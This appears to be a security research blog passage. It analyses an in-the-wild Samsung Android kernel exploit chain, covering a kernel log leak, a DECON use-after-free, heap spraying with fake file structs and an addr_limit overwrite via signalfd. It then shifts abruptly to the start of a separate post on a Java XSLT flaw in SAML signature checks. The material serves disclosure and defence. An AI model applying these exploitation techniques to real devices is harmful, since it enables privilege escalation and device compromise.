a51:/ $ ls -alZ /dev/kmsg
crw-rw---- 1 root system u:object_r:kmsg_device:s0 1, 11 2022-10-27 21:48 /dev/kmsg
$ sesearch -A -s system_server -t kmsg_device -p read precompiled_sepolicy
Samsung, however, has added a custom logging feature that copies kmsg to sec_log, a file found at /data/log/sec_log.log.
The WARN_ON that the exploit triggers is in the Mali GPU graphics driver provided by ARM. ARM replaced the WARN_ON with a call to the more appropriate helper pr_warn in release BX304L01B-SW-99002-r21p0-01rel1 in February 2020. However, the A51 (SM-A515F) and A50 (SM-A505F) still used a vulnerable version of the driver (r19p0) as of January 2021.
Specifically, the WARN_ON is in the function kbase_vinstr_hwcnt_reader_ioctl. To trigger it, the exploit only needs to call an invalid ioctl number on the HWCNT driver. The exploit makes two ioctl calls: first the Mali driver’s HWCNT_READER_SETUP ioctl, which initializes the hwcnt driver and returns a file descriptor on which hwcnt ioctls can be made, and then a call on that fd with an invalid ioctl number, 0xFE.
hwcnt_fd = ioctl(dev_mali_fd, 0x40148008, &v4);
ioctl(hwcnt_fd, 0x4004BEFE, 0);
To trigger the vulnerability, the exploit sends the invalid ioctl to the HWCNT driver a few times and then triggers a bug report by calling:
setprop dumpstate.options bugreportfull;
setprop ctl.start bugreport;
In Android, the property ctl.start starts a service that is defined in init. On the targeted Samsung devices, the SELinux policy for who has access to the ctl.start property is much more permissive than AOSP’s policy. Most notably in this exploit’s case, system_app has access to set ctl_start and thus initiate the bugreport.
allow at_distributor ctl_start_prop:file { getattr map open read };
The bugreport service in dumpstate.rc is a Samsung-specific customization. The AOSP version of dumpstate.rc doesn’t include this service.
The Samsung version of the dumpstate binary (/system/bin/dumpstate) then copies everything from /proc/sec_log to /data/log/sec_log.log, as shown in the pseudo-code below, taken from the first few lines of the dumpstate() function within the binary. The dump_sec_log function (symbols are included within the binary) copies everything from the path provided in argument two to the path provided in argument three.
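A reconstructed sketch of the relevant call (the signature and the first argument, which appears to be a log tag, are illustrative; the decompiled output itself is not reproduced here):

int dumpstate(void) {
    /* ... */
    dump_sec_log("SEC LOG", "/proc/sec_log", "/data/log/sec_log.log");  /* copy arg 2 -> arg 3 */
    /* ... */
}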
After starting the bugreport service, the exploit uses inotify to monitor for IN_CLOSE_WRITE events in the /data/log/ directory. IN_CLOSE_WRITE triggers when a file that was opened for writing is closed, so this watch fires when dumpstate is finished writing to sec_log.log.
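A minimal sketch of that wait using standard inotify(7) (error handling omitted; a real implementation would also check that the event names sec_log.log):

#include <sys/inotify.h>
#include <unistd.h>

void wait_for_sec_log(void) {
    int ifd = inotify_init();
    inotify_add_watch(ifd, "/data/log/", IN_CLOSE_WRITE);
    char event_buf[4096];
    /* blocks until a file under /data/log/ is closed after being written */
    read(ifd, event_buf, sizeof(event_buf));
    close(ifd);
}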
An example of the sec_log.log file contents generated after hitting the WARN_ON statement is shown below. The exploit combs through the file contents looking for two values on the stack, at addresses ending in b60 and bc0: the task_struct and the sys_call_table address.
<4>[90808.635627] [4: poc:25943] ------------[ cut here ]------------
The file /data/log/sec_log.log has the SELinux context dumplog_data_file which is widely accessible to many apps as shown below. The exploit is currently running within the SamsungTTS app which is the system_app SELinux context. While the exploit does not have access to /dev/kmsg due to SELinux access controls, it can access the same contents when they are copied to the sec_log.log which has more permissive access.
$ sesearch -A -t dumplog_data_file -c file -p open precompiled_sepolicy | grep _app
There were a few different changes to address this vulnerability:
Modified the dumpstate binary on the device – As of the March 2021 update, dumpstate no longer writes to /data/log/sec_log.log.
Removed the bugreport service from dumpstate.rc.
In addition there were a few changes made earlier in 2020 that when included would prevent this vulnerability in the future:
As mentioned above, in February 2020 ARM had released version r21p0 of the Mali driver which had replaced the WARN_ON with the more appropriate pr_warn which does not log a full backtrace. The March 2021 Samsung firmware included updating from version r19p0 of the Mali driver to r26p0 which used pr_warn instead of WARN_ON.
Vulnerability #3 - Arbitrary kernel read and write
The final vulnerability in the chain (CVE-2021-25370) is a use-after-free of a file struct in the Display and Enhancement Controller (DECON) Samsung driver for the Display Processing Unit (DPU). According to the upstream commit message, DECON is responsible for creating the video signals from pixel data. This vulnerability is used to gain arbitrary kernel read and write access.
Find the PID of android.hardware.graphics.composer
To be able to trigger the vulnerability, the exploit needs an fd for the driver in order to send ioctl calls. To find the fd, the exploit has to iterate through the fd proc directory for the target process, so it first needs to find the PID of the graphics process.
The exploit connects to LogReader, which listens at /dev/socket/logdr. When a client connects to LogReader, LogReader writes the log contents back to the client. The exploit then configures LogReader to send it logs for the main log buffer (0), the system log buffer (3), and the crash log buffer (4) by writing back to LogReader via the socket:
stream lids=0,3,4
The exploit then monitors the log contents until it sees the words ‘display’ or ‘SDM’. Once it finds a ‘display’ or ‘SDM’ log entry, the exploit then reads the PID from that log entry.
Next, the exploit needs to find the full file path for the DECON driver. The full path can exist in a few different places on the filesystem, so to find which one it is on this device, the exploit iterates through the /proc/<PID>/fd/ directory looking for any file path that contains “graphics/fb0”, the DECON driver. It uses readlink to resolve the file path for each /proc/<PID>/fd/<fd>. The semclipboard vulnerability (vulnerability #1) is then used to get a raw file descriptor for the DECON driver path.
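A sketch of that scan, assuming the PID recovered from the logs (error handling omitted):

#include <stdio.h>
#include <string.h>
#include <unistd.h>

char decon_path[256];

void find_decon_path(int pid) {
    char link[64], path[256];
    for (int fd = 0; fd < 1024; fd++) {
        snprintf(link, sizeof(link), "/proc/%d/fd/%d", pid, fd);
        ssize_t n = readlink(link, path, sizeof(path) - 1);
        if (n < 0)
            continue;
        path[n] = '\0';
        if (strstr(path, "graphics/fb0")) {
            strcpy(decon_path, path);  /* found the DECON driver node */
            return;
        }
    }
}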
Triggering the Use-After-Free
The vulnerability is in the decon_set_win_config function in the Samsung DECON driver. The vulnerability is a relatively common use-after-free pattern in kernel drivers. First, the driver acquires an fd for a fence. This fd is associated with a file pointer in a sync_file struct, specifically the file member. A “fence” is used for sharing buffers and synchronizing access between drivers and different processes.
/**
* struct sync_file - sync file to export to the userspace
* @file: file representing this fence
* @sync_file_list: membership in global file list
* @wq: wait queue for fence signaling
* @fence: fence with the fences in the sync_file
* @cb: fence callback information
*/
struct sync_file {
struct file *file;
/**
* @user_name:
*
* Name of the sync file provided by userspace, for merged fences.
* Otherwise generated through driver callbacks (in which case the
* entire array is 0).
*/
char user_name[32];
#ifdef CONFIG_DEBUG_FS
struct list_head sync_file_list;
#endif
wait_queue_head_t wq;
unsigned long flags;
struct dma_fence *fence;
struct dma_fence_cb cb;
};
The driver then calls fd_install on the fd and file pointer, which makes the fd accessible from userspace and transfers ownership of the reference to the fd table. Userspace is able to call close on that fd. If that fd holds the only reference to the file struct, then the file struct is freed. However, the driver continues to use the pointer to that freed file struct.
decon_err("%s: failed to create sync file\n", __func__);
return-ENOMEM;
}
fd = decon_get_valid_fd();
if(fd <0){
decon_err("%s: failed to get unused fd\n", __func__);
fput((*sync_file)->file);
}
return fd;
}
The function then calls fd_install(win_data->retire_fence, sync_file->file) which means that userspace can now access the fd. When fd_install is called, another reference is not taken on the file so when userspace calls close(fd), the only reference on the file is dropped and the file struct is freed. The issue is that after calling fd_install the function then calls decon_create_release_fences(decon, win_data, sync_file) with the same sync_file that contains the pointer to the freed file struct.
decon_create_release_fences gets a new fd, but then associates that new fd with the freed file struct, sync_file->file, in the call to fd_install.
When decon_set_win_config returns, retire_fence is the closed fd that points to the freed file struct and rel_fence is the open fd that points to the freed file struct.
Fixing the vulnerability
Samsung fixed this use-after-free in March 2021 as CVE-2021-25370. The fix was to move the call to fd_install in decon_set_win_config to the latest possible point in the function after the call to decon_create_release_fences.
To groom the heap, the exploit first opens and closes 30,000+ files using memfd_create. Then the exploit sprays the heap with fake file structs. On this version of the Samsung kernel, the file struct is 0x140 bytes. In these fake file structs, the exploit sets four of the members:
fake_file.f_u = 0x1010101;
fake_file.f_op = kaddr - 0x2071B0 + 0x1094E80;
fake_file.f_count = 0x7F;
fake_file.private_data = addr_limit_ptr;
The f_op member is set to the signalfd_ops for reasons we will cover below in the “Overwriting the addr_limit” section. kaddr is the address leaked using vulnerability #2 described previously. The addr_limit_ptr was calculated by adding 8 to the task_struct address, also leaked using vulnerability #2.
The exploit sprays 25 of these structs across the heap using the MEM_PROFILE_ADD ioctl in the Mali driver.
/**
 * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel
 * @buffer: Pointer to the information
 * @len: Length
 * @padding: Padding
 *
 * The data provided is accessible through a debugfs file
 */
struct kbase_ioctl_mem_profile_add {
	__u64 buffer;   /* field widths per the upstream kbase UAPI headers */
	__u32 len;
	__u32 padding;
};
This ioctl takes a pointer to a buffer, the length of the buffer, and padding as arguments. kbase_api_mem_profile_add will allocate a buffer on the kernel heap and then copy the passed buffer from userspace into the newly allocated kernel buffer.
Finally, kbase_api_mem_profile_add calls kbasep_mem_profile_debugfs_insert. This technique only works when the device is running a kernel with CONFIG_DEBUG_FS enabled, because the purpose of the MEM_PROFILE_ADD ioctl is to write a buffer to DebugFS. As of Android 11, DebugFS should not be enabled on production devices, but requirements like this apply only to devices that launch on that new version of Android. Android 11 launched in September 2020 and the exploit was found in November 2020, so it makes sense that the exploit targeted devices running Android 10 and earlier, where DebugFS would still be mounted.
For example, on the A51 exynos device (SM-A515F) which launched on Android 10, both CONFIG_DEBUG_FS is enabled and DebugFS is mounted.
Because DebugFS is mounted, the exploit is able to use the MEM_PROFILE_ADD ioctl to groom the heap. If DebugFS wasn’t enabled or mounted, kbasep_mem_profile_debugfs_insert would simply free the newly allocated kernel buffer and return.
#else /* CONFIG_DEBUG_FS */

int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,
				      size_t size)
{
	kfree(data);
	return 0;
}
#endif /* CONFIG_DEBUG_FS */
By writing the fake file structs as a single 0x2000-byte buffer rather than as 25 individual 0x140-byte buffers, the exploit writes its fake structs across two whole pages, which increases the odds of reallocating on top of the freed file struct.
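A sketch of the spray, assuming an open Mali device fd and the KBASE_IOCTL_MEM_PROFILE_ADD definition from the kbase UAPI headers (spray_buf holds the 0x2000 bytes of fake file structs):

struct kbase_ioctl_mem_profile_add arg = {
    .buffer  = (__u64)(unsigned long)spray_buf,  /* fake file structs */
    .len     = 0x2000,                           /* two pages in one allocation */
    .padding = 0,
};
ioctl(mali_fd, KBASE_IOCTL_MEM_PROFILE_ADD, &arg);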
The exploit then calls dup2 on the dangling fds. The dup2 syscall will open another fd on the same open file structure that the original points to. In this case, the exploit is calling dup2 to verify that it successfully reallocated a fake file structure in the same place as the freed file structure. dup2 increments the reference count (f_count) in the file structure. In all of the fake file structures, f_count was set to 0x7F, so if any of them is incremented to 0x80, the exploit knows that it successfully reallocated over the freed file struct.
To determine whether any of the file structs’ refcounts were incremented, the exploit iterates through each of the directories under /sys/kernel/debug/mali/mem/ and reads each directory’s mem_profile contents. If it finds the byte 0x80, it knows that it successfully reallocated the freed struct and that the f_count of the fake file struct was incremented.
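A sketch of that scan (error handling omitted):

#include <dirent.h>
#include <stdio.h>
#include <string.h>

int find_bumped_refcount(void) {
    DIR *d = opendir("/sys/kernel/debug/mali/mem/");
    struct dirent *e;
    char path[512], buf[0x2000];
    while ((e = readdir(d)) != NULL) {
        if (e->d_name[0] == '.')
            continue;
        snprintf(path, sizeof(path), "/sys/kernel/debug/mali/mem/%s/mem_profile", e->d_name);
        FILE *f = fopen(path, "r");
        if (!f)
            continue;
        size_t n = fread(buf, 1, sizeof(buf), f);
        fclose(f);
        if (memchr(buf, 0x80, n)) {  /* the fake struct whose f_count dup2 bumped */
            closedir(d);
            return 1;
        }
    }
    closedir(d);
    return 0;
}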
Overwriting the addr_limit
Like many previous Android exploits, to gain arbitrary kernel read and write, the exploit overwrites the kernel address limit (addr_limit). The addr_limit defines the address range that the kernel may access when dereferencing userspace pointers. For userspace threads, the addr_limit is usually USER_DS, or 0x7FFFFFFFFF. For kernel threads, it’s usually KERNEL_DS, or 0xFFFFFFFFFFFFFFFF.
Userspace operations only access addresses below the addr_limit. Therefore, by raising the addr_limit by overwriting it, we will make kernel memory accessible to our unprivileged process. The exploit uses the syscall signalfd with the dangling fd to do this.
signalfd(dangling_fd, 0xFFFFFF8000000000, 8);
According to the man pages, the syscall signalfd is:
signalfd() creates a file descriptor that can be used to accept signals targeted at the caller. This provides an alternative to the use of a signal handler or sigwaitinfo(2), and has the advantage that the file descriptor may be monitored by select(2), poll(2), and epoll(7).
int signalfd(int fd, const sigset_t *mask, int flags);
The exploit called signalfd on the file descriptor that was found to replace the freed one in the previous step. When signalfd is called on an existing file descriptor, only the mask is updated based on the mask passed as the argument, which gives the exploit an 8-byte write to the sigmask of the signalfd_ctx struct.
typedef unsigned long sigset_t;
struct signalfd_ctx {
sigset_t sigmask;
};
The file struct includes a field called private_data, a void *. File structs for signalfd file descriptors store the pointer to the signalfd_ctx struct in the private_data field. As shown above, the signalfd_ctx struct is simply an 8-byte structure containing the mask.
Let’s walk through how the signalfd source code updates the mask:
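Abridged from fs/signalfd.c in a 4.14-era kernel (elisions mine), with markers matching the walkthrough below:

static int do_signalfd4(int ufd, sigset_t *mask, int flags)
{
	struct signalfd_ctx *ctx;

	/* ... */
	sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP));  /* [1] */
	signotset(mask);

	if (ufd == -1) {                                           /* [2] */
		/* ... allocate a new signalfd file ... */
	} else {                                                   /* [3] */
		struct fd f = fdget(ufd);
		if (!f.file)
			return -EBADF;
		ctx = f.file->private_data;                        /* [4] */
		if (f.file->f_op != &signalfd_fops) {              /* [5] */
			fdput(f);
			return -EINVAL;
		}
		spin_lock_irq(&current->sighand->siglock);
		ctx->sigmask = *mask;                              /* [6] the 8-byte write */
		spin_unlock_irq(&current->sighand->siglock);

		wake_up(&current->sighand->signalfd_wqh);
		fdput(f);
	}

	return ufd;
}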
First the function modifies the mask that was passed in. The mask passed into the function holds the signals that should be accepted via the file descriptor, but the sigmask member of the signalfd_ctx struct represents the signals that should be blocked. The sigdelsetmask and signotset calls at [1] make this change. The call to sigdelsetmask ensures that SIGKILL and SIGSTOP are always blocked: it clears bit 8 (SIGKILL) and bit 18 (SIGSTOP) so that they end up set after the next call. signotset then flips each bit in the mask. The mask that is written is therefore ~(mask_in_arg & 0xFFFFFFFFFFFBFEFF).
The function checks whether or not the file descriptor passed in is -1 at [2]. In this exploit’s case it’s not, so we fall into the else block at [3]. At [4], the signalfd_ctx* is set to the private_data pointer.
The signalfd manual page also says that the fd argument “must specify a valid existing signalfd file descriptor”. To verify this, at [5] the syscall checks if the underlying file’s f_op equals the signalfd_ops. This is why the f_op was set to signalfd_ops in the previous section. Finally at [6], the overwrite occurs. The user provided mask is written to the address in private_data. In the exploit’s case, the fake file struct’s private_data was set to the addr_limit pointer. So when the mask is written, we’re actually overwriting the addr_limit.
The exploit calls signalfd with a mask argument of 0xFFFFFF8000000000. So the value written is ~(0xFFFFFF8000000000 & 0xFFFFFFFFFFFBFEFF) = 0x7FFFFFFFFF, also known as USER_DS. We’ll talk about why they overwrite the addr_limit with USER_DS rather than KERNEL_DS in the next section.
Working Around UAO and PAN
“User-Access Override” (UAO) and “Privileged Access Never” (PAN) are two exploit mitigations commonly found on modern Android devices. Their kernel configs are CONFIG_ARM64_UAO and CONFIG_ARM64_PAN. Both are hardware features, introduced in ARMv8.1 (PAN) and ARMv8.2 (UAO). PAN protects against the kernel directly accessing user-space memory. UAO works with PAN by allowing unprivileged load and store instructions to act as privileged load and store instructions when the UAO bit is set.
It’s often said that the addr_limit overwrite technique detailed above doesn’t work on devices with UAO and PAN turned on. The commonly used addr_limit overwrite technique was to change the addr_limit to a very high address, like 0xFFFFFFFFFFFFFFFF (KERNEL_DS), and then use a pair of pipes for arbitrary kernel read and write. This is what Jann and I did in our proof-of-concept for CVE-2019-2215 back in 2019. Our kernel_write function is shown below.
if(len >0x1000) errx(1,"kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);
if(write(kernel_rw_pipe[1], buf, len)!= len) err(1,"kernel_write failed to load userspace buffer");
if(read(kernel_rw_pipe[0],(void*)kaddr, len)!= len) err(1,"kernel_write failed to overwrite kernel memory");
}
This technique works by first writing the pointer to the buffer of the contents that you’d like written to one end of the pipe. By then calling a read and passing in the kernel address you’d like to write to, those contents are then written to that kernel memory address.
With UAO and PAN enabled, if the addr_limit is set to KERNEL_DS and we attempt to execute this function, the first write call will fail because buf is in user-space memory and PAN prevents the kernel from accessing user space memory.
Let’s say we didn’t set the addr_limit to KERNEL_DS (-1) and instead set it to -2, a high kernel address that’s not KERNEL_DS. PAN wouldn’t be enabled, but neither would UAO. Without UAO enabled, the unprivileged load and store instructions are not able to access the kernel memory.
The way the exploit works around the constraints of UAO and PAN is pretty straightforward: it switches the addr_limit between USER_DS and KERNEL_DS based on whether it needs to access user space or kernel space memory. As shown in the uao_thread_switch function below, UAO is enabled when addr_limit == KERNEL_DS and disabled when it is not.
/* Restore the UAO state depending on next's addr_limit */
void uao_thread_switch(struct task_struct *next)
{
	if (IS_ENABLED(CONFIG_ARM64_UAO)) {
		if (task_thread_info(next)->addr_limit == KERNEL_DS)
			asm(ALTERNATIVE("nop", SET_PSTATE_UAO(1), ARM64_HAS_UAO));
		else
			asm(ALTERNATIVE("nop", SET_PSTATE_UAO(0), ARM64_HAS_UAO));
	}
}
The exploit was able to use this technique of toggling the addr_limit between USER_DS and KERNEL_DS because it had such a good primitive from the use-after-free: it could reliably and repeatedly write a new value to the addr_limit by calling signalfd. The exploit’s function for writing to kernel addresses is shown below:
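(A sketch consistent with the description that follows; set_addr_limit_to_KERNEL_DS, addr_limit_ptr, and the kernel_rw_pipe pair are the helpers described in the text, and the names are illustrative.)

void kernel_write(unsigned long kaddr, void *buf, unsigned long buf_len) {
    unsigned long user_ds = 0x7FFFFFFFFF;
    write(kernel_rw_pipe[1], buf, buf_len);              /* [1] stage the payload */
    write(kernel_rw_pipe[1], &user_ds, 8);               /* [2] stage USER_DS for the restore */
    set_addr_limit_to_KERNEL_DS();                       /* [3] helper calls signalfd with mask 0 */
    read(kernel_rw_pipe[0], (void *)kaddr, buf_len);     /* [4] kernel writes payload to kaddr */
    read(kernel_rw_pipe[0], (void *)addr_limit_ptr, 8);  /* [5] restore addr_limit to USER_DS */
}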
The function takes three arguments: the kernel address to write to (kaddr), a pointer to the buffer of contents to write (buf), and the length of the buffer (buf_len). buf is in userspace. When the kernel_write function is entered, the addr_limit is currently set to USER_DS. At [1] the exploit writes the buffer pointer to the pipe. A pointer to the USER_DS value is written to the pipe at [2].
The set_addr_limit_to_KERNEL_DS function at [3] sends a signal to tell another process in the exploit to call signalfd with a mask of 0. Because signalfd performs a NOT on the bits provided in the mask in signotset, the value 0xFFFFFFFFFFFFFFFF (KERNEL_DS) is written to the addr_limit.
Now that the addr_limit is set to KERNEL_DS the exploit can access kernel memory. At [4], the exploit reads from the pipe, writing the contents to kaddr. Then at [5] the exploit returns addr_limit back to USER_DS by reading the value from the pipe that was written at [2] and writing it back to the addr_limit. The exploit’s function to read from kernel memory is the mirror image of this function.
I deliberately am not calling this a bypass because UAO and PAN are acting exactly as they were designed to act: preventing the kernel from accessing user-space memory. UAO and PAN were not developed to protect against arbitrary write access to the addr_limit.
Post-exploitation
The exploit now has arbitrary kernel read and write. It then follows the steps seen in most other Android exploits: overwrite the cred struct for the current process and overwrite the loaded SELinux policy to change the current process’s context to vold. vold is the “Volume Daemon”, responsible for mounting and unmounting external storage. vold runs as root, and while it’s a userspace service, it’s considered kernel-equivalent as described in the Android documentation on security contexts. Because it’s such a highly privileged security context, it makes a prime target.
As stated at the beginning of this post, the sample obtained was discovered in the preparatory stages of the attack. Unfortunately, it did not include the final payload that would have been deployed with this exploit.
Conclusion
This in-the-wild exploit chain is a great example of different attack surfaces and a different “shape” than many of the Android exploits we’ve seen in the past. All three vulnerabilities in this chain were in the manufacturer’s custom components rather than in the AOSP platform or the Linux kernel. It’s also interesting that 2 of the 3 vulnerabilities were logic and design vulnerabilities rather than memory safety issues. Of the 10 other Android in-the-wild 0-days that we’ve tracked since mid-2014, only 2 were not memory corruption vulnerabilities.
The first vulnerability in this chain, the arbitrary file read and write, CVE-2021-25337, was the foundation of the chain: it was used 4 different times, at least once in each step. The vulnerability was in the Java code of a custom content provider in the system_server. Java components in Android devices don’t tend to be popular targets for security researchers despite running at such a privileged level. This highlights an area for further research.
Labeling when vulnerabilities are known to be exploited in-the-wild is important both for targeted users and for the security industry. When in-the-wild 0-days are not transparently disclosed, we are not able to use that information to further protect users, using patch analysis and variant analysis, to gain an understanding of what attackers already know.
The analysis of this exploit chain has provided us with new and important insights into how attackers are targeting Android devices. It highlights a need for more research into manufacturer specific components. It shows where we ought to do further variant analysis. It is a good example of how Android exploits can take many different “shapes” and so brainstorming different detection ideas is a worthwhile exercise. But in this case, we’re at least 18 months behind the attackers: they already know which bugs they’re exploiting and so when this information is not shared transparently, it leaves defenders at a further disadvantage.
This transparent disclosure of in-the-wild status is necessary for both the safety and autonomy of targeted users to protect themselves as well as the security industry to work together to best prevent these 0-days in the future.
Earlier this year, I discovered a surprising attack surface hidden deep inside Java’s standard library: A custom JIT compiler processing untrusted XSLT programs, exposed to remote attackers during XML signature verification. This post discusses CVE-2022-34169, an integer truncation bug in this JIT compiler resulting in arbitrary code execution in many Java-based web applications and identity providers that support the SAML single-sign-on standard.
OpenJDK fixed the discussed issue in July 2022. The Apache BCEL project used by Xalan-J, the origin of the vulnerable code, released a patch in September 2022.
While the vulnerability discussed in this post has been patched, vendors and users should expect further vulnerabilities in SAML.
From a security researcher's perspective, this vulnerability is an example of an integer truncation issue in a memory-safe language, with an exploit that feels very much like a memory corruption. While less common than the typical memory safety issues of C or C++ codebases, weird machines still exist in memory safe languages and will keep us busy even after we move into a bright memory safe future.
Before diving into the vulnerability and its exploit, I’m going to give a quick overview of XML signatures and SAML. What makes XML signatures such an interesting target and why should we care about them?
Introduction
XML Signatures are a typical example of a security protocol invented in the early 2000s. They suffer from high complexity, a large attack surface, and a wealth of configurable features that can weaken or break their security guarantees in surprising ways. Modern usage of XML signatures is mostly restricted to somewhat obscure protocols and legacy applications, but there is one important exception: SAML. SAML, which stands for Security Assertion Markup Language, is one of the two main single-sign-on standards used in modern web applications. While its alternative, the OAuth-based OpenID Connect (OIDC), is gaining popularity, SAML is still the de-facto standard for large enterprises and complex integrations.
SAML relies on XML signatures to protect messages forwarded through the browser. This turns XML signature verification into a very interesting external attack surface for attacking modern multi-tenant SaaS applications. While you don’t need a detailed understanding of SAML to follow this post, interested readers can take a look at Okta's Understanding SAML writeup or the SAML 2.0 wiki entry to get a better understanding of the protocol.
SAML SSO logins work by exchanging XML documents between the application, known as service provider (SP), and the identity provider (IdP). When a user tries to login to an SP, the service provider creates a SAML request. The IdP looks at the SAML request, tries to authenticate the user and sends a SAML response back to the SP. A successful response will contain information about the user, which the application can then use to grant access to its resources.
In the most widely used SAML flow (known as SP Redirect Bind / IdP POST Response) these documents are forwarded through the user's browser using HTTP redirects and POST requests. To protect against modification by the user, the security critical part of the SAML response (known as Assertion) has to be cryptographically signed by the IdP. In addition, the IdP might require SPs to also sign the SAML request to protect against impersonation attacks.
This means that both the IdP and the SP have to parse and verify XML signatures passed to them by a potential malicious actor. Why is this a problem? Let's take a closer look at the way XML signatures work:
XML Signatures
Most signature schemes operate on a raw byte stream and sign the data as seen on the wire. The XML signature standard (known as XMLDsig) instead tries to be robust against insignificant changes to the signed XML document: changing whitespace, line endings, or comments in a signed document should not invalidate its signature.
An XML signature consists of a special Signature element, an example of which is shown below:
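(Example reconstructed; the algorithm URIs are the standard XMLDsig identifiers, and digest, signature, and key values are elided.)

<Signature xmlns="http://www.w3.org/2000/09/xmldsig#">
  <SignedInfo>
    <CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
    <SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
    <Reference URI="#signed-data">
      <Transforms>
        <Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
      </Transforms>
      <DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
      <DigestValue>...</DigestValue>
    </Reference>
  </SignedInfo>
  <SignatureValue>...</SignatureValue>
  <KeyInfo>...</KeyInfo>
</Signature>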
The SignedInfo child contains CanonicalizationMethod and SignatureMethod elements as well as one or more Reference elements describing the integrity protected data.
KeyInfo describes the signer key and can contain a raw public key, a X509 certificate or just a key id.
SignatureValue contains the cryptographic signature (using SignatureMethod) of the SignedInfo element after it has been canonicalized using CanonicalizationMethod.
At this point, only the integrity of the SignedInfo element is protected. To understand how this protection is extended to the actual data, we need to take a look at the way Reference elements work: In theory the Reference URI attribute can either point to an external document (detached signature), an element embedded as a child (enveloping signature) or any element in the outer document (enveloped signature). In practice, most SAML implementations use enveloped signatures and the Reference URI will point to the signed element somewhere in the current document tree.
When a Reference is processed during verification or signing, the referenced content is passed through a chain of Transforms. XMLDsig supports a number of transforms ranging from canonicalization, over base64 decoding to XPath or even XSLT. Once all transforms have been processed the resulting byte stream is passed into the cryptographic hash function specified with the DigestMethod element and the result is stored in DigestValue.
This way, as the whole Reference element is part of SignedInfo, its integrity protection gets extended to the referenced element as well.
Validating a XML signature can therefore be split into two separate steps:
Reference Validation: Iterate through all embedded references and for each reference fetch the referenced data, pump it through the Transforms chain and calculate its hash digest. Compare the calculated Digest with the stored DigestValue and fail if they differ.
Signature Validation: First canonicalize the SignedInfo element using the specified CanonicalizationMethod algorithm. Calculate the signature of SignedInfo using the algorithm specified in SignatureMethod and the signer key described in KeyInfo. Compare the result with SignatureValue and fail if they differ.
Interestingly, the order of these two steps can be implementation specific. While the XMLDsig RFC lists Reference Validation as the first step, performing Signature Validation first can have security advantages as we will see later on.
Correctly validating XML signatures and making sure the data we care about is protected is very difficult in the context of SAML. This will be a topic for later blog posts; at this point we want to focus on the reference validation step:
As part of this step, the application verifying a signature has to run attacker controlled transforms on attacker controlled input. Looking at the list of transformations supported by XMLDsig, one seems particularly interesting: XSLT.
XSLT, which stands for Extensible Stylesheet Language Transformations, is a feature-rich, XML-based programming language designed for transforming XML documents. Embedding an XSLT transform in an XML signature means that the verifier has to run the XSLT program on the referenced XML data.
The code snippet below gives you an example of a simple XSLT transformation. When executed it fetches each <data> element stored inside <input>, grabs the first character of its content and returns it as part of its <output>. So <input><data>abc</data><data>def</data></input> would be transformed into <output><data>a</data><data>d</data></output>
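A stylesheet with that behavior, reconstructed to match the described input and output:

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/input">
    <output>
      <xsl:for-each select="data">
        <!-- XPath substring() is 1-indexed: grab the first character -->
        <data><xsl:value-of select="substring(., 1, 1)"/></data>
      </xsl:for-each>
    </output>
  </xsl:template>
</xsl:stylesheet>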
Exposing a fully-featured language runtime to an external attacker seems like a bad idea, so let's take a look at how this feature is implemented in Java’s OpenJDK.
XSLT in Java
Java’s main interface for working with XML signatures is the javax.xml.crypto.dsig.XMLSignature class and its sign and validate methods. We are mostly interested in the validate method, which is shown below:
    // validate the signature
    boolean sigValidity = sv.validate(vc);  // (A)
    if (!sigValidity) {
        validationStatus = false;
        validated = true;
        return validationStatus;
    }

    // validate all References
    List<Reference> refs = this.si.getReferences();
    boolean validateRefs = true;
    for (int i = 0, size = refs.size(); validateRefs && i < size; i++) {
        Reference ref = refs.get(i);
        boolean refValid = ref.validate(vc);  // (B)
        LOG.debug("Reference [{}] is valid: {}", ref.getURI(), refValid);
        validateRefs &= refValid;
    }

    if (!validateRefs) {
        LOG.debug("Couldn't validate the References");
        validationStatus = false;
        validated = true;
        return validationStatus;
    }
    [..]
}
As we can see, the validate method first validates the signature of the SignedInfo element in (A) before validating all the references in (B). This means that an attack against the XSLT runtime will require a valid signature for the SignedInfo element and we’ll discuss later how an attacker can bypass this requirement.
The call to ref.validate() in (B) ends up in the DomReference.validate method shown below:
The code gets the referenced data in (D), transforms it in (E) and compares the digest of the result with the digest stored in the signature in (F). Most of the complexity is hidden behind the call to transform in (E) which loops through all Transform elements defined in the Reference and executes them.
As this is Java, we have to walk through a lot of indirection layers before we end up at the interesting parts. Take a look at the call stack below if you want to follow along and step through the code:
at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer(TemplatesImpl.java:584)
at com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl.newTransformer(TransformerFactoryImpl.java:818)
at com.sun.org.apache.xml.internal.security.transforms.implementations.TransformXSLT.enginePerformTransform(TransformXSLT.java:130)
at com.sun.org.apache.xml.internal.security.transforms.Transform.performTransform(Transform.java:316)
at org.jcp.xml.dsig.internal.dom.ApacheTransform.transformIt(ApacheTransform.java:188)
at org.jcp.xml.dsig.internal.dom.ApacheTransform.transform(ApacheTransform.java:124)
at org.jcp.xml.dsig.internal.dom.DOMTransform.transform(DOMTransform.java:173)
at org.jcp.xml.dsig.internal.dom.DOMReference.transform(DOMReference.java:457)
at org.jcp.xml.dsig.internal.dom.DOMReference.validate(DOMReference.java:387)
at org.jcp.xml.dsig.internal.dom.DOMXMLSignature.validate(DOMXMLSignature.java:281)
If we specify a XSLT transform and the org.jcp.xml.dsig.secureValidation property isn't enabled (we’ll come back to this later) we will end up in the file src/java.xml/share/classes/com/sun/org/apache/xalan/internal/xsltc/trax/TransformerFactoryImpl.java which is part of a module called XSLTC.
XSLTC, the XSLT compiler, is originally part of the Apache Xalan project. OpenJDK forked Xalan-J, a Java based XSLT runtime, to provide XSLT support as part of Java’s standard library. While the original Apache project has a number of features that are not supported in the OpenJDK fork, most of the core code is identical and CVE-2022-34169 affected both codebases.
